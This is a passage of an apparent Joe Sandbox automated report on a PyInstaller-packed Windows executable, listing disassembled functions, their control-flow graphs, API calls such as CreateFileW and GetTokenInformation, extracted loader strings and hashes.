7ff6313f83c6 19002->19003 19004 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 19003->19004 19005 7ff6313f83d1 19004->19005 19005->18632 19007 7ff6313f0d81 19006->19007 19008 7ff6313f0d8b 19006->19008 19010 7ff6313eda6c _fread_nolock 12 API calls 19007->19010 19009 7ff6313f0d90 19008->19009 19016 7ff6313f0d97 _get_daylight 19008->19016 19011 7ff6313eadbc __free_lconv_mon 11 API calls 19009->19011 19014 7ff6313f0d89 19010->19014 19011->19014 19012 7ff6313f0d9d 19015 7ff6313e52d4 _get_daylight 11 API calls 19012->19015 19013 7ff6313f0dca HeapReAlloc 19013->19014 19013->19016 19014->18636 19015->19014 19016->19012 19016->19013 19017 7ff6313f3ab0 _get_daylight 2 API calls 19016->19017 19017->19016 19020 7ff6313f92b9 __crtLCMapStringW 19018->19020 19019 7ff6313f786e 19019->18678 19019->18679 19020->19019 19021 7ff6313ef2d8 6 API calls 19020->19021 19021->19019

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF6313F6220 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 133 7ff6313f6220-7ff6313f625b call 7ff6313f5ba8 call 7ff6313f5bb0 call 7ff6313f5c18 140 7ff6313f6485-7ff6313f64d1 call 7ff6313ead74 call 7ff6313f5ba8 call 7ff6313f5bb0 call 7ff6313f5c18 133->140 141 7ff6313f6261-7ff6313f626c call 7ff6313f5bb8 133->141 167 7ff6313f660f-7ff6313f667d call 7ff6313ead74 call 7ff6313f1a98 140->167 168 7ff6313f64d7-7ff6313f64e2 call 7ff6313f5bb8 140->168 141->140 147 7ff6313f6272-7ff6313f627c 141->147 149 7ff6313f629e-7ff6313f62a2 147->149 150 7ff6313f627e-7ff6313f6281 147->150 151 7ff6313f62a5-7ff6313f62ad 149->151 153 7ff6313f6284-7ff6313f628f 150->153 151->151 156 7ff6313f62af-7ff6313f62c2 call 7ff6313eda6c 151->156 154 7ff6313f6291-7ff6313f6298 153->154 155 7ff6313f629a-7ff6313f629c 153->155 154->153 154->155 155->149 158 7ff6313f62cb-7ff6313f62d9 155->158 163 7ff6313f62c4-7ff6313f62c6 call 7ff6313eadbc 156->163 164 7ff6313f62da-7ff6313f62e6 call 7ff6313eadbc 156->164 163->158 175 7ff6313f62ed-7ff6313f62f5 164->175 187 7ff6313f667f-7ff6313f6686 167->187 188 7ff6313f668b-7ff6313f668e 167->188 168->167 178 7ff6313f64e8-7ff6313f64f3 call 7ff6313f5be8 168->178 175->175 176 7ff6313f62f7-7ff6313f6308 call 7ff6313f0d04 175->176 176->140 186 7ff6313f630e-7ff6313f6364 call 7ff6313dd090 * 4 call 7ff6313f613c 176->186 178->167 185 7ff6313f64f9-7ff6313f651c call 7ff6313eadbc GetTimeZoneInformation 178->185 199 7ff6313f65e4-7ff6313f660e call 7ff6313f5ba0 call 7ff6313f5b90 call 7ff6313f5b98 185->199 200 7ff6313f6522-7ff6313f6543 185->200 245 7ff6313f6366-7ff6313f636a 186->245 191 7ff6313f671b-7ff6313f671e 187->191 192 7ff6313f66c5-7ff6313f66d8 call 7ff6313eda6c 188->192 193 7ff6313f6690 188->193 197 7ff6313f6724-7ff6313f672c call 7ff6313f6220 191->197 198 7ff6313f6693 191->198 208 7ff6313f66e3-7ff6313f66fe call 7ff6313f1a98 192->208 209 7ff6313f66da 192->209 193->198 204 7ff6313f6698-7ff6313f66c4 call 7ff6313eadbc call 7ff6313dbc70 197->204 198->204 205 7ff6313f6693 call 7ff6313f649c 198->205 206 7ff6313f6545-7ff6313f654b 200->206 207 7ff6313f654e-7ff6313f6555 200->207 205->204 206->207 215 7ff6313f6569 207->215 216 7ff6313f6557-7ff6313f655f 207->216 232 7ff6313f6705-7ff6313f6717 call 7ff6313eadbc 208->232 233 7ff6313f6700-7ff6313f6703 208->233 214 7ff6313f66dc-7ff6313f66e1 call 7ff6313eadbc 209->214 214->193 225 7ff6313f656b-7ff6313f65df call 7ff6313dd090 * 4 call 7ff6313f307c call 7ff6313f6734 * 2 215->225 216->215 222 7ff6313f6561-7ff6313f6567 216->222 222->225 225->199 232->191 233->214 248 7ff6313f6370-7ff6313f6374 245->248 249 7ff6313f636c 245->249 248->245 251 7ff6313f6376-7ff6313f639b call 7ff6313e6f1c 248->251 249->248 257 7ff6313f639e-7ff6313f63a2 251->257 259 7ff6313f63a4-7ff6313f63af 257->259 260 7ff6313f63b1-7ff6313f63b5 257->260 259->260 262 7ff6313f63b7-7ff6313f63bb 259->262 260->257 264 7ff6313f643c-7ff6313f6440 262->264 265 7ff6313f63bd-7ff6313f63e5 call 7ff6313e6f1c 262->265 266 7ff6313f6442-7ff6313f6444 264->266 267 7ff6313f6447-7ff6313f6454 264->267 273 7ff6313f6403-7ff6313f6407 265->273 274 7ff6313f63e7 265->274 266->267 269 7ff6313f646f-7ff6313f647e call 7ff6313f5ba0 call 7ff6313f5b90 267->269 270 7ff6313f6456-7ff6313f646c call 7ff6313f613c 267->270 269->140 270->269 273->264 279 7ff6313f6409-7ff6313f6427 call 7ff6313e6f1c 273->279 277 7ff6313f63ea-7ff6313f63f1 274->277 277->273 281 7ff6313f63f3-7ff6313f6401 277->281 285 7ff6313f6433-7ff6313f643a 279->285 281->273 281->277 285->264 286 7ff6313f6429-7ff6313f642d 285->286 286->264 287 7ff6313f642f 286->287 287->285
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F6265
                                                                                                                                                                        • Part of subcall function 00007FF6313F5BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BCC
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
                                                                                                                                                                        • Part of subcall function 00007FF6313EAD74: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6313EAD53,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EAD7D
                                                                                                                                                                        • Part of subcall function 00007FF6313EAD74: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6313EAD53,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EADA2
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F6254
                                                                                                                                                                        • Part of subcall function 00007FF6313F5C18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5C2C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64CA
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64DB
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64EC
                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6313F672C), ref: 00007FF6313F6513
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                      • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                      • API String ID: 3714727158-690618308
                                                                                                                                                                      • Opcode ID: 40133e312105b648a39a3f8162b8de2ad0b752b0e369cc50cd833349efd25a78
                                                                                                                                                                      • Instruction ID: 8ad8abc493bab8258c1ea5230095c6461ca0b2a737cbf998a9519bcd1ecc9b9b
                                                                                                                                                                      • Opcode Fuzzy Hash: 40133e312105b648a39a3f8162b8de2ad0b752b0e369cc50cd833349efd25a78
                                                                                                                                                                      • Instruction Fuzzy Hash: 82D1BFA6E0825286FB20EF32D8511B977A1EF84B94F458136EA1DC7796DF3CE841A740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F716C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 318 7ff6313f716c-7ff6313f71df call 7ff6313f6ea0 321 7ff6313f71e1-7ff6313f71ea call 7ff6313e52b4 318->321 322 7ff6313f71f9-7ff6313f7203 call 7ff6313e82e4 318->322 327 7ff6313f71ed-7ff6313f71f4 call 7ff6313e52d4 321->327 328 7ff6313f7205-7ff6313f721c call 7ff6313e52b4 call 7ff6313e52d4 322->328 329 7ff6313f721e-7ff6313f7287 CreateFileW 322->329 341 7ff6313f753a-7ff6313f755a 327->341 328->327 332 7ff6313f7304-7ff6313f730f GetFileType 329->332 333 7ff6313f7289-7ff6313f728f 329->333 335 7ff6313f7362-7ff6313f7369 332->335 336 7ff6313f7311-7ff6313f734c GetLastError call 7ff6313e5248 CloseHandle 332->336 338 7ff6313f72d1-7ff6313f72ff GetLastError call 7ff6313e5248 333->338 339 7ff6313f7291-7ff6313f7295 333->339 344 7ff6313f7371-7ff6313f7374 335->344 345 7ff6313f736b-7ff6313f736f 335->345 336->327 352 7ff6313f7352-7ff6313f735d call 7ff6313e52d4 336->352 338->327 339->338 346 7ff6313f7297-7ff6313f72cf CreateFileW 339->346 350 7ff6313f737a-7ff6313f73cf call 7ff6313e81fc 344->350 351 7ff6313f7376 344->351 345->350 346->332 346->338 356 7ff6313f73d1-7ff6313f73dd call 7ff6313f70a8 350->356 357 7ff6313f73ee-7ff6313f741f call 7ff6313f6c20 350->357 351->350 352->327 356->357 363 7ff6313f73df 356->363 364 7ff6313f7425-7ff6313f7467 357->364 365 7ff6313f7421-7ff6313f7423 357->365 366 7ff6313f73e1-7ff6313f73e9 call 7ff6313eaf34 363->366 367 7ff6313f7489-7ff6313f7494 364->367 368 7ff6313f7469-7ff6313f746d 364->368 365->366 366->341 369 7ff6313f749a-7ff6313f749e 367->369 370 7ff6313f7538 367->370 368->367 372 7ff6313f746f-7ff6313f7484 368->372 369->370 373 7ff6313f74a4-7ff6313f74e9 CloseHandle CreateFileW 369->373 370->341 372->367 375 7ff6313f751e-7ff6313f7533 373->375 376 7ff6313f74eb-7ff6313f7519 GetLastError call 7ff6313e5248 call 7ff6313e8424 373->376 375->370 376->375
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                      • Opcode ID: a4dc467cbdc7b29f33270d5940dc9ec44c3090a1b145cc4da5abd16a4521a908
                                                                                                                                                                      • Instruction ID: c8d8acee6c8b32f012bced0000c09320345c06e4e0ab43a0747b86d9d731745d
                                                                                                                                                                      • Opcode Fuzzy Hash: a4dc467cbdc7b29f33270d5940dc9ec44c3090a1b145cc4da5abd16a4521a908
                                                                                                                                                                      • Instruction Fuzzy Hash: EAC1B137F28A4685FB10CFA5C4916AC37A1FB49B98B011235DE2E9B794CF38E555D340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D7900 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6313D154F), ref: 00007FF6313D7997
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: GetEnvironmentVariableW.KERNEL32(00007FF6313D39CF), ref: 00007FF6313D7B4A
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6313D7B67
                                                                                                                                                                        • Part of subcall function 00007FF6313E7C9C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313E7CB5
                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6313D7A51
                                                                                                                                                                        • Part of subcall function 00007FF6313D2AD0: MessageBoxW.USER32 ref: 00007FF6313D2BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                      • API String ID: 3752271684-1116378104
                                                                                                                                                                      • Opcode ID: 9b8627d2c3ecf1a7861168c1765fe97762ffa896a0d939e1fb66cee7903bdb51
                                                                                                                                                                      • Instruction ID: 4b08c2cf759908b36d327ced99976495e6e579b4b7ae640c42804cbd9197b0ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 9b8627d2c3ecf1a7861168c1765fe97762ffa896a0d939e1fb66cee7903bdb51
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C518362F0D65341FF54BB72A8152BA52819F89BC4F446431ED0ECB797EE3CEA06A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F649C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 792 7ff6313f649c-7ff6313f64d1 call 7ff6313f5ba8 call 7ff6313f5bb0 call 7ff6313f5c18 799 7ff6313f660f-7ff6313f667d call 7ff6313ead74 call 7ff6313f1a98 792->799 800 7ff6313f64d7-7ff6313f64e2 call 7ff6313f5bb8 792->800 812 7ff6313f667f-7ff6313f6686 799->812 813 7ff6313f668b-7ff6313f668e 799->813 800->799 806 7ff6313f64e8-7ff6313f64f3 call 7ff6313f5be8 800->806 806->799 811 7ff6313f64f9-7ff6313f651c call 7ff6313eadbc GetTimeZoneInformation 806->811 822 7ff6313f65e4-7ff6313f660e call 7ff6313f5ba0 call 7ff6313f5b90 call 7ff6313f5b98 811->822 823 7ff6313f6522-7ff6313f6543 811->823 815 7ff6313f671b-7ff6313f671e 812->815 816 7ff6313f66c5-7ff6313f66d8 call 7ff6313eda6c 813->816 817 7ff6313f6690 813->817 820 7ff6313f6724-7ff6313f672c call 7ff6313f6220 815->820 821 7ff6313f6693 815->821 830 7ff6313f66e3-7ff6313f66fe call 7ff6313f1a98 816->830 831 7ff6313f66da 816->831 817->821 826 7ff6313f6698-7ff6313f66c4 call 7ff6313eadbc call 7ff6313dbc70 820->826 821->826 827 7ff6313f6693 call 7ff6313f649c 821->827 828 7ff6313f6545-7ff6313f654b 823->828 829 7ff6313f654e-7ff6313f6555 823->829 827->826 828->829 836 7ff6313f6569 829->836 837 7ff6313f6557-7ff6313f655f 829->837 850 7ff6313f6705-7ff6313f6717 call 7ff6313eadbc 830->850 851 7ff6313f6700-7ff6313f6703 830->851 835 7ff6313f66dc-7ff6313f66e1 call 7ff6313eadbc 831->835 835->817 844 7ff6313f656b-7ff6313f65df call 7ff6313dd090 * 4 call 7ff6313f307c call 7ff6313f6734 * 2 836->844 837->836 842 7ff6313f6561-7ff6313f6567 837->842 842->844 844->822 850->815 851->835
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64CA
                                                                                                                                                                        • Part of subcall function 00007FF6313F5C18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5C2C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64DB
                                                                                                                                                                        • Part of subcall function 00007FF6313F5BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BCC
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6313F64EC
                                                                                                                                                                        • Part of subcall function 00007FF6313F5BE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BFC
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
                                                                                                                                                                        • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6313F672C), ref: 00007FF6313F6513
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                                                                                                                                      • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                      • API String ID: 1511944507-690618308
                                                                                                                                                                      • Opcode ID: 01f53ec0730f848f3b94891690d7c75eea43e33e255622230833973c1efab838
                                                                                                                                                                      • Instruction ID: adf95e90dfbe360ac1701701b97c8ddc400494e2cfd2785adf71d494b520fd03
                                                                                                                                                                      • Opcode Fuzzy Hash: 01f53ec0730f848f3b94891690d7c75eea43e33e255622230833973c1efab838
                                                                                                                                                                      • Instruction Fuzzy Hash: 23518EB6E0864286F720DF32E8915B977A0BF88784F455136EA5DC3796DF3CE450AB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F0DE8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                      • Opcode ID: c91a2c26122b6bd4c1cafb1c2484870efabc11783f044b087954d77ccac6e2c6
                                                                                                                                                                      • Instruction ID: 2e8e0026f42056f7b899bcba9b28166909625d80c28d6f23ce9e3970cfa5f350
                                                                                                                                                                      • Opcode Fuzzy Hash: c91a2c26122b6bd4c1cafb1c2484870efabc11783f044b087954d77ccac6e2c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F02DD22F1D74381FB65AB26A8102B92AD5AF41BA0F054635ED7DC77D2DE3DE801A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D1710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 7ff6313d1710-7ff6313d1724 1 7ff6313d173e-7ff6313d1742 0->1 2 7ff6313d1726-7ff6313d173d call 7ff6313d2ad0 0->2 4 7ff6313d1744-7ff6313d174d call 7ff6313d12b0 1->4 5 7ff6313d1768-7ff6313d178b call 7ff6313d7bc0 1->5 11 7ff6313d175f-7ff6313d1767 4->11 12 7ff6313d174f-7ff6313d175a call 7ff6313d2ad0 4->12 13 7ff6313d178d-7ff6313d17b8 call 7ff6313d2830 5->13 14 7ff6313d17b9-7ff6313d17d4 call 7ff6313d3f80 5->14 12->11 20 7ff6313d17ee-7ff6313d1801 call 7ff6313e07c4 14->20 21 7ff6313d17d6-7ff6313d17e9 call 7ff6313d2ad0 14->21 27 7ff6313d1823-7ff6313d1827 20->27 28 7ff6313d1803-7ff6313d181e call 7ff6313d2830 20->28 26 7ff6313d192f-7ff6313d1932 call 7ff6313e013c 21->26 34 7ff6313d1937-7ff6313d194e 26->34 31 7ff6313d1841-7ff6313d1861 call 7ff6313e4f40 27->31 32 7ff6313d1829-7ff6313d1835 call 7ff6313d1050 27->32 37 7ff6313d1927-7ff6313d192a call 7ff6313e013c 28->37 41 7ff6313d1882-7ff6313d1888 31->41 42 7ff6313d1863-7ff6313d187d call 7ff6313d2830 31->42 38 7ff6313d183a-7ff6313d183c 32->38 37->26 38->37 43 7ff6313d1915-7ff6313d1918 call 7ff6313e4f2c 41->43 44 7ff6313d188e-7ff6313d1897 41->44 49 7ff6313d191d-7ff6313d1922 42->49 43->49 48 7ff6313d18a0-7ff6313d18c2 call 7ff6313e048c 44->48 52 7ff6313d18c4-7ff6313d18dc call 7ff6313e0bcc 48->52 53 7ff6313d18f5-7ff6313d18fc 48->53 49->37 58 7ff6313d18e5-7ff6313d18f3 52->58 59 7ff6313d18de-7ff6313d18e1 52->59 55 7ff6313d1903-7ff6313d190b call 7ff6313d2830 53->55 61 7ff6313d1910 55->61 58->55 59->48 62 7ff6313d18e3 59->62 61->43 62->61
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                      • API String ID: 2030045667-3833288071
                                                                                                                                                                      • Opcode ID: 7be9962e71ed7c31013ec4ca6f16be77bcc022290123e05d4894a39d76e719fa
                                                                                                                                                                      • Instruction ID: 798312970f53e25dd43812004ae9c7da7d356753f7ad0c7508a7764162869e05
                                                                                                                                                                      • Opcode Fuzzy Hash: 7be9962e71ed7c31013ec4ca6f16be77bcc022290123e05d4894a39d76e719fa
                                                                                                                                                                      • Instruction Fuzzy Hash: A8518CB1F0C68286FB109B21E8516B96791FF45B94F844031EE5DC779AEE3CE649E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8900 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000100000001,00007FF6313D40FC,00007FF6313D78C1,?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8940
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8951
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00007FF6313D7CD6(TokenIntegrityLevel),?,00007FF6313D1785), ref: 00007FF6313D8973
                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00007FF6313D1785), ref: 00007FF6313D897D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,?,00007FF6313D1785), ref: 00007FF6313D89BA
                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6313D89CC
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D89E4
                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8A16
                                                                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6313D8A3D
